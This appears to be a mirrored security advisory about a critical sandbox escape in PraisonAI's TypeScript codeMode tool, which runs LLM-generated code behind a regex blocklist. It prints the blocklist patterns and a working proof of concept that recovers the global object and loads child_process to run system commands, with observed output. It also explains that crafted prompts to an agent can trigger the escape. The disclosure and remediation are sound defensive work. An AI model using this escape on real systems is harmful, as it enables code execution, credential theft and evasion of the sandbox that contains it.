VulnWatch VulnWatch
← Back to dashboard
Critical github · GHSA-p69m-4f92-2v84

PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool

Published Jun 18, 2026 CVSS 9.8

Summary

The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function() with a with(sandbox) pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function('return this')() to recover the global object, followed by global.require() with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.

Details

Vulnerable code (lines 187–191):

const fn = new Function(
  'sandbox',
  `with (sandbox) { ${code} }`
);
const result = fn(sandbox);

The code parameter comes from LLM tool call arguments (the execute method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136):

const blockedPatterns = [
  /require\s*\(\s*['"]child_process['"]\s*\)/,
  /require\s*\(\s*['"]fs['"]\s*\)/,
  /import\s+.*from\s+['"]child_process['"]/,
  /process\.exit/,
  /eval\s*\(/,
];

Three fundamental weaknesses:

  1. with(sandbox) does not provide isolation. The with statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets process: undefined and require: undefined, but these are recovered via the global scope:

    const g = Function('return this')();
g.require('child_' + 'process')

  2. Blocklist evasion via string concatenation. The regex /require\s*\(\s*['"]child_process['"]\s*\)/ requires the literal string 'child_process' or "child_process" inside require(). Using require('child_' + 'process') bypasses this because the regex sees a variable concatenation, not a literal string.

  3. Function('return this')() is not blocked. None of the blocklist patterns match Function(, return this, or global.require.

PoC

Setup: Clean checkout at commit d5f1114a, Node.js v20.20.0 (tested environment).

Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):

// This code bypasses ALL blocklist patterns and achieves RCE:
const code = `
const Func = (function(){}).constructor;
const proc = Func('return process')();
console.log('process.version:', proc.version);
const g = Function('return this')();
const mod = 'child_' + 'process';
const cp = g.require(mod);
console.log('RCE:', cp.execSync('id').toString().trim());
`;

Observed output (executed in this environment):

OUT: process.version: v20.20.0
OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)

The escape was confirmed by executing the exact code-mode sandbox pattern (new Function('sandbox', 'with (sandbox) { ... }')) with the blocklist applied first. ALL blocklist patterns were bypassed, and the id command returned the real system user ID.

Negative control — blocklist correctly catches direct require:

const code = `require('child_process')`;
// Returns: "Blocked pattern detected: require\s*\(\s*['"]child_process['"]\s*\)"

Negative control — blocklist correctly catches eval:

const code = `eval('process')`;
// Returns: "Blocked pattern detected: eval\s*\("

Cleanup: No persistence needed; the code runs in-process.

Impact

An attacker who can influence the code parameter of the codeMode tool (via crafted prompts to an AI agent using praisonai-ts) achieves full arbitrary code execution on the host system. This includes:

  • Read/write any file accessible to the process user
  • Execute arbitrary system commands via child_process
  • Exfiltrate environment variables containing API keys, tokens, and credentials
  • Install persistent backdoors by writing to startup files
  • Move laterally in containerized environments

Suggested remediation

The with(sandbox) + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:

  1. Use vm module with proper context isolation:
import { createContext, runInContext } from 'vm';
const sandbox = createContext({ /* safe globals only */ });
runInContext(code, sandbox, { timeout: 5000 });

  1. Or use isolated-vm for true process-level isolation with separate V8 isolates.

  2. Or run code in a subprocess (like the Python _execute_code_sandboxed pattern already used in python_tools.py) with a clean environment and resource limits.

  3. If a blocklist approach must be retained, add patterns for:

    • Function( / new Function
    • constructor / __proto__ / prototype
    • return this / return global
    • global / globalThis / window But note: blocklist approaches are inherently fragile and will continue to have bypasses.
Remote Code Execution Agentic / MCP

Affected AI Products

ai agent ollama llm
View original source
Get the weekly digest. Every Monday: top AI security stories of the week. Free.